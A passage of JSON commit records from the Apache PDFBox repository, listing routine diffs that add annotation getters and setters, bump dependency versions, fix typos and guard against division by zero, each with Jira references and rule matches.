"pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/AppearanceStyle.java", - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/PlainText.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4212": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4212", - "relevance": 2 - } - ] - }, - { - "commit_id": "3452fc1e8d71796579366d55b6c40ea91810d5be", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1527300943, - "hunks": 2, - "message": "PDFBOX-3353: support /RD and /BE git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1832289 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationFreeText.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationFreeText.java", - "index 75f97dd83..496b81101 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationFreeText.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationFreeText.java", - "@@ -22,2 +22,3 @@ import org.apache.pdfbox.cos.COSFloat;", - " import org.apache.pdfbox.cos.COSName;", - "+import org.apache.pdfbox.pdmodel.common.PDRectangle;", - " import org.apache.pdfbox.pdmodel.interactive.annotation.handlers.PDAppearanceHandler;", - "@@ -226,2 +227,60 @@ public class PDAnnotationFreeText extends PDAnnotationMarkup", - "+ /**", - "+ * This will set the border effect dictionary, specifying effects to be applied when drawing the", - "+ * line.", - "+ *", - "+ * @param be The border effect dictionary to set.", - "+ *", - "+ */", - "+ public void setBorderEffect(PDBorderEffectDictionary be)", - "+ {", - "+ getCOSObject().setItem(COSName.BE, be);", - "+ }", - "+", - "+ /**", - "+ * This will retrieve the border effect dictionary, specifying effects to be applied used in", - "+ * drawing the line.", - "+ *", - "+ * @return The border effect dictionary", - "+ */", - "+ public PDBorderEffectDictionary getBorderEffect()", - "+ {", - "+ COSBase base = getCOSObject().getDictionaryObject(COSName.BE);", - "+ if (base instanceof COSDictionary)", - "+ {", - "+ return new PDBorderEffectDictionary((COSDictionary) base);", - "+ }", - "+ return null;", - "+ }", - "+", - "+ /**", - "+ * This will set the rectangle difference rectangle. Giving the difference between the", - "+ * annotations rectangle and where the drawing occurs. (To take account of any effects applied", - "+ * through the BE entry for example)", - "+ *", - "+ * @param rd the rectangle difference", - "+ *", - "+ */", - "+ public void setRectDifference(PDRectangle rd)", - "+ {", - "+ getCOSObject().setItem(COSName.RD, rd);", - "+ }", - "+", - "+ /**", - "+ * This will get the rectangle difference rectangle. Giving the difference between the", - "+ * annotations rectangle and where the drawing occurs. (To take account of any effects applied", - "+ * through the BE entry for example)", - "+ *", - "+ * @return the rectangle difference", - "+ */", - "+ public PDRectangle getRectDifference()", - "+ {", - "+ COSBase base = getCOSObject().getDictionaryObject(COSName.RD);", - "+ if (base instanceof COSArray)", - "+ {", - "+ return new PDRectangle((COSArray) base);", - "+ }", - "+ return null;", - "+ }", - "+", - " /**" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationFreeText.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-3353": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-3353", - "relevance": 2 - } - ] - }, - { - "commit_id": "4b032ac9eb84cc1c4cde0d129b9d33ef9feb4120", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1529078824, - "hunks": 1, - "message": "PDFBOX-4112: update surefire plugin version to current for jdk10 git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1833606 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/parent/pom.xml b/parent/pom.xml", - "index 5e35db3a0..3dd8dae3c 100644", - "--- a/parent/pom.xml", - "+++ b/parent/pom.xml", - "@@ -50,2 +50,8 @@", - " UTF-8", - "+", - "+ ", - "+ 2.21.0", - " " - ], - "changed_files": [ - "parent/pom.xml" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4112": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4112", - "relevance": 2 - } - ] - }, - { - "commit_id": "474f73167054ecab8a03e04c161838a0d4a1d2df", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1527274097, - "hunks": 1, - "message": "PDFBOX-3353: add methods for callout and line ending style git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1832266 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationFreeText.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationFreeText.java", - "index 5d1a39feb..75f97dd83 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationFreeText.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationFreeText.java", - "@@ -171,3 +171,57 @@ public class PDAnnotationFreeText extends PDAnnotationMarkup", - " }", - "- ", - "+", - "+ /**", - "+ * This will set the coordinates of the callout line.", - "+ *", - "+ * @param callout An array of four or six numbers specifying a callout line attached to the free", - "+ * text annotation. Six numbers [ x1 y1 x2 y2 x3 y3 ] represent the starting, knee point, and", - "+ * ending coordinates of the line in default user space, four numbers [ x1 y1 x2 y2 ] represent", - "+ * the starting and ending coordinates of the line.", - "+ */", - "+ public final void setCallout(float[] callout)", - "+ {", - "+ COSArray newCallout = new COSArray();", - "+ newCallout.setFloatArray(callout);", - "+ getCOSObject().setItem(COSName.CL, newCallout);", - "+ }", - "+", - "+ /**", - "+ * This will get the coordinates of the callout line.", - "+ *", - "+ * @return An array of four or six numbers specifying a callout line attached to the free text", - "+ * annotation. Six numbers [ x1 y1 x2 y2 x3 y3 ] represent the starting, knee point, and ending", - "+ * coordinates of the line in default user space, four numbers [ x1 y1 x2 y2 ] represent the", - "+ * starting and ending coordinates of the line.", - "+ */", - "+ public float[] getCallout()", - "+ {", - "+ COSBase base = getCOSObject().getDictionaryObject(COSName.CL);", - "+ if (base instanceof COSArray)", - "+ {", - "+ return ((COSArray) base).toFloatArray();", - "+ }", - "+ return null;", - "+ }", - "+", - "+ /**", - "+ * This will set the line ending style.", - "+ *", - "+ * @param style The new style.", - "+ */", - "+ public final void setLineEndingStyle(String style)", - "+ {", - "+ getCOSObject().setName(COSName.LE, style);", - "+ }", - "+", - "+ /**", - "+ * This will retrieve the line ending style.", - "+ *", - "+ * @return The line ending style, possible values shown in the LE_ constants section, LE_NONE if", - "+ * missing, never null.", - "+ */", - "+ public String getLineEndingStyle()", - "+ {", - "+ return getCOSObject().getNameAsString(COSName.LE, PDAnnotationLine.LE_NONE);", - "+ } ", - "+", - " /**" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationFreeText.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-3353": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-3353", - "relevance": 2 - } - ] - }, - { - "commit_id": "efeae65834ddfda272d8ef06168d79a90c7c515b", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1524995515, - "hunks": 0, - "message": "PDFBOX-4189: remove image that is no used git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1830501 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/examples/src/main/resources/org/apache/pdfbox/resources/ttf/bengali-correct-text.png b/examples/src/main/resources/org/apache/pdfbox/resources/ttf/bengali-correct-text.png", - "deleted file mode 100644", - "index b5aadd116..000000000", - "Binary files a/examples/src/main/resources/org/apache/pdfbox/resources/ttf/bengali-correct-text.png and /dev/null differ" - ], - "changed_files": [ - "examples/src/main/resources/org/apache/pdfbox/resources/ttf/bengali-correct-text.png" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4189": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4189", - "relevance": 2 - } - ] - }, - { - "commit_id": "3d971d66ca0c9c9d8d7ffa729eaea9838040c19e", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1524671724, - "hunks": 1, - "message": "PDFBOX-3353: add BorderEffect getter/setter git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1830095 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationPolygon.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationPolygon.java", - "index 1f4217edb..310251d44 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationPolygon.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationPolygon.java", - "@@ -79,2 +79,33 @@ public class PDAnnotationPolygon extends PDAnnotationMarkup", - "+ /**", - "+ * This will set the border effect dictionary, specifying effects to be applied when drawing the", - "+ * line.", - "+ *", - "+ * @param be The border effect dictionary to set.", - "+ *", - "+ */", - "+ public void setBorderEffect(PDBorderEffectDictionary be)", - "+ {", - "+ getCOSObject().setItem(COSName.BE, be);", - "+ }", - "+", - "+ /**", - "+ * This will retrieve the border effect dictionary, specifying effects to be applied used in", - "+ * drawing the line.", - "+ *", - "+ * @return The border effect dictionary", - "+ */", - "+ public PDBorderEffectDictionary getBorderEffect()", - "+ {", - "+ COSDictionary be = (COSDictionary) getCOSObject().getDictionaryObject(COSName.BE);", - "+ if (be != null)", - "+ {", - "+ return new PDBorderEffectDictionary(be);", - "+ }", - "+ else", - "+ {", - "+ return null;", - "+ }", - "+ }", - "+", - " /**" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationPolygon.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-3353": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-3353", - "relevance": 2 - } - ] - }, - { - "commit_id": "5316af04abb8afff9d40ed26a47940b3f470058e", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1530635820, - "hunks": 1, - "message": "PDFBOX-4259: fix imports git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1835006 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/examples/src/main/java/org/apache/pdfbox/examples/pdmodel/AddAnnotations.java b/examples/src/main/java/org/apache/pdfbox/examples/pdmodel/AddAnnotations.java", - "index 56db227ef..6b744e1f9 100644", - "--- a/examples/src/main/java/org/apache/pdfbox/examples/pdmodel/AddAnnotations.java", - "+++ b/examples/src/main/java/org/apache/pdfbox/examples/pdmodel/AddAnnotations.java", - "@@ -39,2 +39,3 @@ import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotationLine;", - " import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotationLink;", - "+import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotationPolygon;", - " import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotationSquare;" - ], - "changed_files": [ - "examples/src/main/java/org/apache/pdfbox/examples/pdmodel/AddAnnotations.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4259": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4259", - "relevance": 2 - } - ] - }, - { - "commit_id": "aa2ed82a31d4951fbf77bd1c61bf36b9e9f91eb6", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1524671346, - "hunks": 7, - "message": "PDFBOX-4071: correct javadoc, fix typo git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/1.8@1830091 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationMarkup.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationMarkup.java", - "index 8e914f33c..6d886eb08 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationMarkup.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationMarkup.java", - "@@ -28,3 +28,3 @@ import java.util.Calendar;", - " /**", - "- * This class represents the additonal fields of a Markup type Annotation. See", - "+ * This class represents the additional fields of a Markup type Annotation. See", - " * section 12.5.6 of ISO32000-1:2008 (starting with page 390) for details on", - "diff --git a/preflight/src/main/java/org/apache/pdfbox/preflight/action/AbstractActionManager.java b/preflight/src/main/java/org/apache/pdfbox/preflight/action/AbstractActionManager.java", - "index 421fe2966..a0f04232b 100644", - "--- a/preflight/src/main/java/org/apache/pdfbox/preflight/action/AbstractActionManager.java", - "+++ b/preflight/src/main/java/org/apache/pdfbox/preflight/action/AbstractActionManager.java", - "@@ -115,6 +115,4 @@ public abstract class AbstractActionManager", - " /**", - "- * Call the valid(boolean, List) method with the additonalActionAuth set to false.", - "+ * Call the valid(boolean, List) method with the additionalActionAuth set to false.", - " * ", - "- * @param error", - "- * the validation error list to updated if the validation fails.", - " * @return", - "@@ -131,3 +129,3 @@ public abstract class AbstractActionManager", - " * Return false if the dictionary is invalid (ex : missing key). If the ActionManager represents an", - "- * AdditionalAction, this method returns false and updates the error list when the additonalActionAuth parameter is", - "+ * AdditionalAction, this method returns false and updates the error list when the additionalActionAuth parameter is", - " * set to false.", - "@@ -138,3 +136,3 @@ public abstract class AbstractActionManager", - " * ", - "- * @param additonalActionAuth", - "+ * @param additionalActionAuth", - " * boolean to know if an additional action is authorized.", - "@@ -143,5 +141,5 @@ public abstract class AbstractActionManager", - " */", - "- public boolean valid(boolean additonalActionAuth) throws ValidationException", - "+ public boolean valid(boolean additionalActionAuth) throws ValidationException", - " {", - "- if (isAdditionalAction() && !additonalActionAuth)", - "+ if (isAdditionalAction() && !additionalActionAuth)", - " {" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationMarkup.java", - "preflight/src/main/java/org/apache/pdfbox/preflight/action/AbstractActionManager.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4071": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "1.8.15", - "1.8.16", - "1.8.17" - ], - "matched_rules": [ - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4071", - "relevance": 2 - } - ] - }, - { - "commit_id": "8bee174efa54f392c06ec615f47f3c166e21b1e7", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1530975489, - "hunks": 4, - "message": "PDFBOX-4071: update bouncycastle version git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1835315 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/parent/pom.xml b/parent/pom.xml", - "index 364005320..9a1c4816d 100644", - "--- a/parent/pom.xml", - "+++ b/parent/pom.xml", - "@@ -56,2 +56,3 @@", - " 2.21.0", - "+ 1.60", - " ", - "@@ -84,3 +85,3 @@", - " bcprov-jdk15on", - "- 1.59", - "+ ${bouncycastle.version}", - " ", - "@@ -89,3 +90,3 @@", - " bcmail-jdk15on", - "- 1.59", - "+ ${bouncycastle.version}", - " ", - "@@ -94,3 +95,3 @@", - " bcpkix-jdk15on", - "- 1.59", - "+ ${bouncycastle.version}", - " " - ], - "changed_files": [ - "parent/pom.xml" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4071": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4071", - "relevance": 2 - } - ] - }, - { - "commit_id": "e3d94d5da9d7f1bd496ff57ecc13461d28205154", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1524760473, - "hunks": 2, - "message": "PDFBOX-3353: handle special case where quadpoints surface is empty git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1830241 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDStrikeoutAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDStrikeoutAppearanceHandler.java", - "index 15724195e..6cf33d043 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDStrikeoutAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDStrikeoutAppearanceHandler.java", - "@@ -115,12 +115,20 @@ public class PDStrikeoutAppearanceHandler extends PDAbstractAppearanceHandler", - " Math.pow(pathsArray[i * 8 + 1] - pathsArray[i * 8 + 5], 2)));", - "- float x0 = pathsArray[i * 8 + 4] + (pathsArray[i * 8] - ", - "- pathsArray[i * 8 + 4]) / len0 * (len0 / 2 - ab.width);", - "- float y0 = pathsArray[i * 8 + 5] + (pathsArray[i * 8 + 1] - ", - "- pathsArray[i * 8 + 5]) / len0 * (len0 / 2 - ab.width);", - "+ float x0 = pathsArray[i * 8 + 4];", - "+ float y0 = pathsArray[i * 8 + 5];", - "+ if (Float.compare(len0, 0) != 0)", - "+ {", - "+ // only if both coordinates are not identical to avoid divide by zero", - "+ x0 += (pathsArray[i * 8] - pathsArray[i * 8 + 4]) / len0 * (len0 / 2 - ab.width);", - "+ y0 += (pathsArray[i * 8 + 1] - pathsArray[i * 8 + 5]) / len0 * (len0 / 2 - ab.width);", - "+ }", - " float len1 = (float) (Math.sqrt(Math.pow(pathsArray[i * 8 + 2] - pathsArray[i * 8 + 6], 2) + ", - " Math.pow(pathsArray[i * 8 + 3] - pathsArray[i * 8 + 7], 2)));", - "- float x1 = pathsArray[i * 8 + 6] + (pathsArray[i * 8 + 2] - ", - "- pathsArray[i * 8 + 6]) / len1 * (len1 / 2 - ab.width);", - "- float y1 = pathsArray[i * 8 + 7] + (pathsArray[i * 8 + 3] - ", - "- pathsArray[i * 8 + 7]) / len1 * (len1 / 2 - ab.width);", - "+ float x1 = pathsArray[i * 8 + 6];", - "+ float y1 = pathsArray[i * 8 + 7];", - "+ if (Float.compare(len1, 0) != 0)", - "+ {", - "+ // only if both coordinates are not identical to avoid divide by zero", - "+ x1 += (pathsArray[i * 8 + 2] - pathsArray[i * 8 + 6]) / len1 * (len1 / 2 - ab.width);", - "+ y1 += (pathsArray[i * 8 + 3] - pathsArray[i * 8 + 7]) / len1 * (len1 / 2 - ab.width);", - "+ }", - " cs.moveTo(x0, y0);" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDStrikeoutAppearanceHandler.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-3353": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-3353", - "relevance": 2 - } - ] - }, - { - "commit_id": "bec69941e3e12d924cbeb7e99c0a1ebb6c836fd5", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1532780442, - "hunks": 2, - "message": "PDFBOX-4281: remove Apache Wink dependency, add dependencies for class copied from Apache Wink git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1836892 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/examples/pom.xml b/examples/pom.xml", - "index 6201cf029..02dc795ac 100644", - "--- a/examples/pom.xml", - "+++ b/examples/pom.xml", - "@@ -87,7 +87,13 @@", - " ", - "- org.apache.wink", - "- wink-component-test-support", - "- 1.4", - "+ javax.servlet", - "+ javax.servlet-api", - "+ 4.0.1", - " test", - " ", - "+ ", - "+ org.apache.geronimo.specs", - "+ geronimo-jaxrs_1.1_spec", - "+ 1.0", - "+ test", - "+ ", - " " - ], - "changed_files": [ - "examples/pom.xml" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4281": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4281", - "relevance": 2 - } - ] - }, - { - "commit_id": "0bf49ccaa2c834a9b86d35f3500eb3825499ba93", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1530116371, - "hunks": 6, - "message": "PDFBOX-3353: convert quadratic B\u00c3\u00a9zier curve to cubic git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1834517 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", - "index 2e5708ed6..8d58eff54 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", - "@@ -536,5 +536,6 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", - "-", - " private void addPath(final PDAppearanceContentStream contentStream, GeneralPath path) throws IOException", - " {", - "+ double curX = 0;", - "+ double curY = 0;", - " PathIterator it = path.getPathIterator(new AffineTransform());", - "@@ -552,6 +553,19 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", - " (float) coords[3], (float) coords[4], (float) coords[5]);", - "+ curX = coords[4];", - "+ curY = coords[5];", - " break;", - " case PathIterator.SEG_QUADTO:", - "- contentStream.curveTo1((float) coords[0], (float) coords[1], (float) coords[2], (float) coords[3]);", - "- // not sure whether curveTo1 or curveTo2 is to be used here", - "+ // Convert quadratic B\u00c3\u00a9zier curve to cubic", - "+ // https://fontforge.github.io/bezier.html", - "+ // CP1 = QP0 + 2/3 *(QP1-QP0)", - "+ // CP2 = QP2 + 2/3 *(QP1-QP2)", - "+ double cp1x = curX + 2d / 3d * (coords[0] - curX);", - "+ double cp1y = curY + 2d / 3d * (coords[1] - curY);", - "+ double cp2x = coords[2] + 2d / 3d * (coords[0] - coords[2]);", - "+ double cp2y = coords[3] + 2d / 3d * (coords[1] - coords[3]);", - "+ contentStream.curveTo((float) cp1x, (float) cp1y,", - "+ (float) cp2x, (float) cp2y,", - "+ (float) coords[2], (float) coords[3]);", - "+ curX = coords[2];", - "+ curY = coords[3];", - " break;", - "@@ -559,2 +573,4 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", - " contentStream.lineTo((float) coords[0], (float) coords[1]);", - "+ curX = coords[0];", - "+ curY = coords[1];", - " break;", - "@@ -562,2 +578,4 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", - " contentStream.moveTo((float) coords[0], (float) coords[1]);", - "+ curX = coords[0];", - "+ curY = coords[1];", - " break;" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-3353": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-3353", - "relevance": 2 - } - ] - }, - { - "commit_id": "569989ea8dff1c6f134b737b25e25fdf37d4ce00", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1526759268, - "hunks": 10, - "message": "PDFBOX-3353: refactor double code, move it to abstract class git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1831918 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java", - "index 72626ee53..955b6510e 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java", - "@@ -54,2 +54,4 @@ public abstract class PDAbstractAppearanceHandler implements PDAppearanceHandler", - "+ static final double ARROW_ANGLE = Math.toRadians(30);", - "+", - " /**", - "@@ -275,3 +277,138 @@ public abstract class PDAbstractAppearanceHandler implements PDAppearanceHandler", - " }", - "- ", - "+", - "+ void drawStyle(String style, final PDAppearanceContentStream cs, float x, float y,", - "+ float width, boolean hasStroke, boolean hasBackground) throws IOException", - "+ {", - "+ switch (style)", - "+ {", - "+ case PDAnnotationLine.LE_OPEN_ARROW:", - "+ case PDAnnotationLine.LE_CLOSED_ARROW:", - "+ if (Float.compare(x, 0) != 0)", - "+ {", - "+ // ending", - "+ drawArrow(cs, x - width, y, -width * 9);", - "+ }", - "+ else", - "+ {", - "+ // start", - "+ drawArrow(cs, width, y, width * 9);", - "+ }", - "+ if (PDAnnotationLine.LE_CLOSED_ARROW.equals(style))", - "+ {", - "+ cs.closePath();", - "+ }", - "+ break;", - "+ case PDAnnotationLine.LE_BUTT:", - "+ cs.moveTo(x, y - width * 3);", - "+ cs.lineTo(x, y + width * 3);", - "+ break;", - "+ case PDAnnotationLine.LE_DIAMOND:", - "+ drawDiamond(cs, x, y, width * 3);", - "+ break;", - "+ case PDAnnotationLine.LE_SQUARE:", - "+ cs.addRect(x - width * 3, y - width * 3, width * 6, width * 6);", - "+ break;", - "+ case PDAnnotationLine.LE_CIRCLE:", - "+ addCircle(cs, x, y, width * 3);", - "+ break;", - "+ case PDAnnotationLine.LE_R_OPEN_ARROW:", - "+ case PDAnnotationLine.LE_R_CLOSED_ARROW:", - "+ if (Float.compare(x, 0) != 0)", - "+ {", - "+ // ending", - "+ drawArrow(cs, x + width, y, width * 9);", - "+ }", - "+ else", - "+ {", - "+ // start", - "+ drawArrow(cs, -width, y, -width * 9);", - "+ }", - "+ if (PDAnnotationLine.LE_R_CLOSED_ARROW.equals(style))", - "+ {", - "+ cs.closePath();", - "+ }", - "+ break;", - "+ case PDAnnotationLine.LE_SLASH:", - "+ // the line is 18 x linewidth at an angle of 60\u00c2\u00b0", - "+ cs.moveTo(x + (float) (Math.cos(Math.toRadians(60)) * width * 9),", - "+ y + (float) (Math.sin(Math.toRadians(60)) * width * 9));", - "+ cs.lineTo(x + (float) (Math.cos(Math.toRadians(240)) * width * 9),", - "+ y + (float) (Math.sin(Math.toRadians(240)) * width * 9));", - "+ break;", - "+ default:", - "+ break;", - "+ }", - "+ if (INTERIOR_COLOR_STYLES.contains(style))", - "+ {", - "+ 